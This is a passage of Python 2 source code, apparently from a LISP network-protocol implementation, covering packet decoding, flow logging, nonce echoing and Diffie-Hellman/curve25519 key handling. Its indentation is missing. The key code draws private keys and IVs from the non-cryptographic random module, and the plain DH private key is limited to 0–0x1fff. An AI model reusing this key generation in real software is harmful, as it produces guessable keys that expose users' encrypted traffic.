self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
